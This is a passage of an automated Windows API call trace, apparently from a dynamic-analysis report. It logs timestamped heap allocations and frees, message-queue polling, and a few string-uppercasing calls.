lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.374] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0190.374] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.374] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0190.374] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0190.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.375] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0190.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0190.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.375] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0190.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.376] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.376] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0190.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0190.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0190.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0190.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0190.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.377] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.377] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0190.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0190.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.378] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.378] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0190.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0190.379] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0190.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0190.379] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0190.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0190.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dd8 [0190.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0190.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0190.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0190.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0190.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0190.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0190.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0190.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0190.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0190.381] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0190.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0190.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.382] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0190.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.382] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.382] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0190.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0190.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0190.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0190.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0190.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.384] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0190.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0190.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0190.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0190.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0190.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0190.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0190.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.385] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0190.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0190.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0190.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0190.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0190.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0190.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.385] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0190.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0190.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0190.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0190.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0190.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0190.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0190.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0190.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0190.386] 